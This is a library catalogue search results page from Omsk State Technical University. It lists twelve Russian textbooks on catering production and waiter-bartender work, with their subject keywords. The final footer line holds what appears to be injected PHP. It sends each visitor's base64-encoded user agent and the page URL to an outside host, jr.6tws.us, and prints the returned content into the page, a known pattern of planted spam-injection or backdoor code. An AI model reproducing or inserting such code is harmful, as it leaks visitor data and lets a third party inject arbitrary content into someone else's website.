Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

18 пользователей



 
      Наши партнеры
Студенческий информационный портал компании
("Ключевые слова=МОЕЧНАЯ КУХОННОЙ ПОСУДЫ")
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 12
1. 
Радченко Л. А. Организация производства и обслуживания на предприятиях общественного питания [Текст] / Л. А. Радченко, 2013. - 321 с.
Ключевые слова 
МЕНЮ -- ДОКУМЕНТАЦИЯ -- ОРГАНИЗАЦИЯ ТРУДА рациональная -- Нормирование труда -- РАБОЧЕЕ МЕСТО -- Цех овощной -- Цех мясной -- Цех рыбный -- Цех мясо-рыбный -- Цех доработки полуфабрикатов -- Цех обработки зелени -- Цех горячий -- Цех холодный -- Цех кондитерский -- Моечная кухонной посуды -- Бракераж -- Хлеборезка -- Срок хранения продуктов -- ПОМЕЩЕНИЕ ТОРГОВОЕ -- ПРИБОР СТОЛОВЫЙ -- БЕЛЬЕ СТОЛОВОЕ -- КАРТА ВИН -- РЕСТОРАН - ОБСУЖИВАНИЕ -- БАНКЕТ С ЧАСТИЧНЫМ ОБСЛУЖИВАНИЕМ -- БАНКЕТ - ФУРШЕТ -- БАНКЕТ - КОКТЕЙЛЬ -- БАНКЕТ - ЧАЙ -- СТОЛ ШВЕДСКИЙ -- ПИТАНИЕ ИНТУРИСТОВ -- ПИТАНИЕ СОЦИАЛЬНОЕ -- ПИТАНИЕ СТУДЕНТОВ -- ПИТАНИЕ УЧАЩИХСЯ -- ПИТАНИЕ РАБОЧИХ
Держатели документа (Информация об экземплярах) 
2. 
Радченко Л. А. Организация производства на предприятиях общественного питания [Текст] : учеб. для студ. образоват. учреждений сред. проф. образования / Л. А. Радченко, 2009. - 374 с.
Держатели документа (Информация об экземплярах) 
3. 
Ермакова В. И. Официант, бармен [Текст] / В. И. Ермакова, 2012. - 271 с.
Ключевые слова 
ОФИЦИАНТ - БАРМЕН -- ПРЕДПРИЯТИЕ ОБЩЕСТВЕННОГО ПИТАНИЯ -- УСЛУГИ ОБЩЕСТВЕННОГО ПИТАНИЯ -- ПРОЦЕСС ТЕХНОЛОГИЧЕСКИЙ -- ПОМЕЩЕНИЕ ПРОИЗВОДСТВЕННОЕ -- ПОМЕЩЕНИЕ СКЛАДСКОЕ -- МОЕЧНАЯ КУХОННОЙ ПОСУДЫ -- ПОМЕЩЕНИЕ ДЛЯ НАРЕЗАНИЯ ХЛЕБА -- ОРГАНИЗАЦИЯ РАЗДАТОЧНОЙ РАБОТЫ -- СЕРВИС - БАР -- СЕРВИЗНАЯ -- МОЕЧНАЯ СТОЛОВОЙ ПОСУДЫ -- ОБОРУДОВАНИЕ ОБЕДЕННОГО ЗАЛА -- ЗАЛ ОБЕДЕННЫЙ -- ОБОРУДОВАНИЕ БАНКЕТНОГО ЗАЛА -- ЗАЛ БАНКЕТНЫЙ -- ПОСУДА СТОЛОВАЯ -- ПРИБОР СТОЛОВЫЙ -- ПОСУДА ФАРФОРОВАЯ -- ПОСУДА КЕРАМИЧЕСКАЯ -- ПОСУДА ХРУСТАЛЬНАЯ -- ПОСУДА МЕТАЛЛИЧЕСКАЯ -- БЕЛЬЕ СТОЛОВОЕ -- СЕРВИРОВКА СТОЛА -- МЕНЮ -- КАРТА ВИН -- ВСТРЕЧА ПОТРЕБИТЕЛЕЙ -- ЗАКАЗ БЛЮД -- ПОДАЧА БЛЮД -- БАНКЕТ -- БАНКЕТ - ЧАЙ -- БАНКЕТ - ФУРШЕТ -- БАНКЕТ - КОКТЕЙЛЬ -- БАНКЕТ КОМБИНИРОВАННЫЙ -- ОБСЛУЖИВАНИЕ ПОТРЕБИТЕЛЕЙ - ГОСТИНИЦА -- ОБСЛУЖИВАНИЕ ПОТРЕБИТЕЛЕЙ - КОНФЕРЕНЦИЯ -- ОБСЛУЖИВАНИЕ ПОТРЕБИТЕЛЕЙ - СВАДЬБА -- ОБСЛУЖИВАНИЕ ПОТРЕБИТЕЛЕЙ - НОВЫЙ ГОД -- ОБСЛУЖИВАНИЕ ПОТРЕБИТЕЛЕЙ НА ДОМУ -- БАР -- ПОСУДА БАРНАЯ -- ИНВЕНТАРЬ БАРА -- БАРМЕН -- БАР - МУЗЫКА -- РАЗЛИВ НАПИТКОВ -- ПРАВИЛА ПОДАЧИ НАПИТКОВ -- ПРАВИЛА ПОДАЧИ ТАБАЧНЫХ ИЗДЕЛИЙ -- КОКТЕЙЛЬ -- ТЕХНОЛОГИЯ ПРИГОТОВЛЕНИЯ КОКТЕЙЛЕЙ -- НАПИТКИ -- ОФИЦИАНТ -- БАРМЕН -- ХАРАКТЕРИСТИКА КВАЛИФИКАЦИОННАЯ -- ОХРАНА ТРУДА
Держатели документа (Информация об экземплярах) 
4. 
Официант-бармен [Текст] / сост. В. А. Барановский, 2013. - 427 с.
Ключевые слова 
ОФИЦИАНТ - БАРМЕН -- ПРЕДПРИЯТИЕ ОБЩЕСТВЕННОГО ПИТАНИЯ -- РЕСТОРАН -- КАФЕ -- БАР -- ПРОЦЕСС ТЕХНОЛОГИЧЕСКИЙ -- МОЕЧНАЯ КУХОННОЙ ПОСУДЫ -- РАЗДАТОЧНАЯ -- ХОЗЯЙСТВО СКЛАДСКОЕ -- БРАКЕРАЖ -- ПОМЕЩЕНИЕ ТОРГОВОЕ -- ИНТЕРЬЕР РЕСТОРАНА -- ОБОРУДОВАНИЕ ЗАЛА -- БУФЕТ -- СЕРВИЗНАЯ -- МОЕЧНАЯ СТОЛОВОЙ ПОСУДЫ -- МЕНЮ -- ПОСУДА СТОЛОВАЯ -- ПРИБОР СТОЛОВЫЙ -- БЕЛЬЕ СТОЛОВОЕ -- ОБСЛУЖИВАНИЕ ПОСЕТИТЕЛЕЙ -- КУЛЬТУРА ПОВЕДЕНИЯ ОФИЦИАНТА -- ВСТРЕЧА ПОСЕТИТЕЛЕЙ -- ПРИЕМ ЗАКАЗА -- ПОДАЧА БЛЮД -- КОКТЕЙЛЬ -- ПУНШ -- ГЛИНТВЕЙН -- ГРОГ -- КРЮШОН -- САНГРИЯ -- РАСЧЕТ С ПОСЕТИТЕЛЯМИ -- СПЕЦОБСЛУЖИВАНИЕ -- ОБСЛУЖИВАНИЕ БАНКЕТНОЕ -- БАНКЕТ -- БАНКЕТ С ЧАСТИЧНЫМ ОБСЛУЖИВАНИЕМ -- БАНКЕТ - ЧАЙ -- БАНКЕТ - ФУРШЕТ -- БАНКЕТ - КОКТЕЙЛЬ -- БАРМЕН -- ОБСЛУЖИВАНИЕ ИНТУРИСТОВ -- СТОЛ ШВЕДСКИЙ -- КУХНЯ АЛЖИРСКАЯ -- КУХНЯ АНГЛИЙСКАЯ -- КУХНЯ АМЕРИКАНСКАЯ -- КУХНЯ КАНАДСКАЯ -- КУХНЯ АРАБСКАЯ -- Кухня болгарская -- Кухня югославская -- Кухня венгерская -- КУХНЯ ИНДОНЕЗИЙСКАЯ -- Кухня индийская -- Кухня иранская -- Кухня итальянская -- Кухня немецкая -- Кухня польская -- Кухня румынская -- Кухня скандинавская -- КУХНЯ ФРАНЦУЗСКАЯ -- Кухня чешская -- Кухня южноамериканская -- Кухня японская -- РЕКЛАМА - РЕСТОРАН -- СПРОС ПОТРЕБИТЕЛЬСКИЙ -- ТЕХНИКА БЕЗОПАСНОСТИ - ПРЕДПРИЯТИЕ ОБЩЕСТВЕННОГО ПИТАНИЯ -- ПОДГОТОВКА ПРОФЕССИОНАЛЬНАЯ -- ЭКЗАМЕН ТЕОРЕТИЧЕСКИЙ -- ЭКЗАМЕН ПРАКТИЧЕСКИЙ -- ОХРАНА ТРУДА -- САНПИН 2.3.2.1078-01 -- САНПИН 2.3.5.021-94 -- САНПИН 42-123-4117-86
Держатели документа (Информация об экземплярах) 
5. 
Радченко Л. А. Организация производства на предприятиях общественного питания [Текст] / Л. А. Радченко, 2009. - 374 с.
Держатели документа (Информация об экземплярах) 
6. 
Радченко Л. А. Организация производства на предприятиях общественного питания [Текст] : учеб. для студ. образоват. учреждений сред. проф. образования / Л. А. Радченко, 2007. - 374 с.
Держатели документа (Информация об экземплярах) 
7. 
Радченко Л. А. Организация производства на предприятиях общественного питания [Текст] : учеб. для студ. образоват. учреждений сред. проф. образования / Л. А. Радченко, 2005. - 347 с.
Держатели документа (Информация об экземплярах) 
8. 
Организация производства на предприятиях общественного питания [Текст] : Учеб. пособие для студ. учеб. заведений сред. проф. образования / Авт.-сост. Л. А. Радченко; Под ред. С. Н. Белоусовой, 2001. - 345 с.
Держатели документа (Информация об экземплярах) 
9. 
Официант-бармен от А до Я [Текст] : справочное издание, 2002. - 223 с.
Ключевые слова 
РЕСТОРАН -- Кафе -- БАР -- ЦЕХ ОВОЩНОЙ -- ЦЕХ МЯСО-РЫБНЫЙ -- ЦЕХ ГОРЯЧИЙ -- ЦЕХ ХОЛОДНЫЙ -- ЦЕХ КОНДИТЕРСКИЙ -- МОЕЧНАЯ КУХОННОЙ ПОСУДЫ -- Раздаточная -- ХОЗЯЙСТВО СКЛАДСКОЕ -- БРАКЕРАЖ -- ИНТЕРЬЕР РЕСТОРАНА -- ОБОРУДОВАНИЕ ЗАЛА РЕСТОРАНА -- БУФЕТ -- Касса -- СЕРВИЗНАЯ -- МОЕЧНАЯ СТОЛОВОЙ ПОСУДЫ -- МЕНЮ -- ПОСУДА СТОЛОВАЯ -- ПРИБОР СТОЛОВЫЙ -- БЕЛЬЕ СТОЛОВОЕ -- ЗАЛ ТОРГОВЫЙ -- СЕРВИРОВКА -- ОБСЛУЖИВАНИЕ РЕСТОРАННОЕ -- БАНКЕТ- прием -- БАНКЕТ - ЧАЙ -- БАНКЕТ - ФУРШЕТ -- БАНКЕТ - КОКТЕЙЛЬ -- БУФЕТ-бар -- ОБСЛУЖИВАНИЕ интуристов -- СПРОС ПОТРЕБИТЕЛЬСКИЙ -- РЕСТОРАН - реклама -- общепит - охрана труда -- ТЕХНИКА БЕЗОПАСНОСТИ -- БЕЗОПАСНОСТЬ ПОЖАРНАЯ
Держатели документа (Информация об экземплярах) 
10. 
Барановский В. А. Официант-бармен [Текст] : учеб. пособие для учащихся учеб. заведений начального проф. образования / В. А. Барановский, Л. В. Кулькова, 2002. - 347 с.
Ключевые слова 
ОФИЦИАНТ-бармен -- ПРЕДПРИЯТИЕ ОБЩЕСТВЕННОГО ПИ -- ЦЕХ ОВОЩНОЙ -- ЦЕХ МЯСНОЙ -- ЦЕХ РЫБНЫЙ -- ЦЕХ ГОРЯЧИЙ -- ЦЕХ ХОЛОДНЫЙ -- МОЕЧНАЯ КУХОННОЙ ПОСУДЫ -- РАЗДАТОЧНАЯ -- ХОЗЯЙСТВО СКЛАДСКОЕ -- БРАКЕРАЖ -- ПОМЕЩЕНИЕ ТОРГОВОЕ -- ИНТЕРЬЕР РЕСТОРАНА -- БУФЕТ -- БАР -- МАШИНА КОНТРОЛЬНО-КАССОВАЯ -- СЕРВИЗНАЯ -- МОЕЧНАЯ СТОЛОВОЙ ПОСУДЫ -- МЕНЮ -- ПОСУДА СТОЛОВАЯ -- БЕЛЬЕ СТОЛОВОЕ -- ЗАЛ ТОРГОВЫЙ -- СЕРВИРОВКА СТОЛА -- КУЛЬТУРА ПОВЕДЕНИЯ официанта -- ОБСЛУЖИВАНИЕ РЕСТОРАННОЕ -- БАНКЕТ -- БАНКЕТ - ЧАЙ -- БАНКЕТ- ПРИЕМ -- БАНКЕТ - ФУРШЕТ -- БАНКЕТ - КОКТЕЙЛЬ -- БАРМЕН -- БУФЕТ бар -- Банкет с частичным обслуживанием -- ОБСЛУЖИВАНИЕ ИНТУРИСТОВ -- СТОЛ ШВЕДСКИЙ -- КУХНЯ алжирская -- Кухня английская -- Кухня американская -- Кухня канадская -- Кухня арабская -- Кухня болгарская -- Кухня югославская -- Кухня венгерская -- Кухня индийская -- Кухня иранская -- Кухня итальянская -- Кухня немецкая -- Кухня польская -- Кухня румынская -- Кухня скандинавская -- КУХНЯ ФРАНЦУЗСКАЯ -- Кухня чешская -- Кухня южноамериканская -- Кухня японская -- РЕКЛАМА - РЕСТОРАН -- ОХРАНА ТРУДА
11. 
Извекова В. Г. Бармен, официант [Текст] : учеб. пособие: соответствует Гос. образоват. стандарту РФ / В. Г. Извекова, 2004. - 319 с.
Ключевые слова 
ПРЕДПРИЯТИЕ ОБЩЕСТВЕННОГО ПИ -- ПРИБОР СТОЛОВЫЙ -- ЦЕХ ОВОЩНОЙ -- ЦЕХ РЫБНЫЙ -- ЦЕХ ГОРЯЧИЙ -- ЦЕХ ХОЛОДНЫЙ -- ЦЕХ КОНДИТЕРСКИЙ -- МОЕЧНАЯ КУХОННОЙ ПОСУДЫ -- РАЗДАТОЧНАЯ -- СКЛАД -- БРАКЕРАЖ -- ПОМЕЩЕНИЕ ТОРГОВОЕ -- СЕРВИЗНАЯ -- МЕНЮ -- КАРТА ВИН -- ПОСУДА СТОЛОВАЯ -- БЕЛЬЕ СТОЛОВОЕ -- ЗАЛ ТОРГОВЫЙ -- ОБСЛУЖИВАНИЕ РЕСТОРАННОЕ -- КЕЙТЕРИНГ -- БАНКЕТ -- ПРИЕМ -- БУФЕТ -- БАР -- ДЕСЕРТ - БАР -- Пиво -- ПОСУДА стеклянная -- ОБСЛУЖИВАНИЕ ИНТУРИСТОВ -- СТОЛ ШВЕДСКИЙ -- РЕКЛАМА - РЕСТОРАН
Держатели документа (Информация об экземплярах) 
12. 
Организация производства на предприятиях общественного питания [Текст] : Учеб. пособие для учеб. заведений сред. проф. образования и учеб. заведений начал. проф. образования / Под ред. Белоусовой С. Н., 2000. - 345 с.


    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 3183 - 26.02.2020
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 1.00 с.12 запросов, 0.79c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;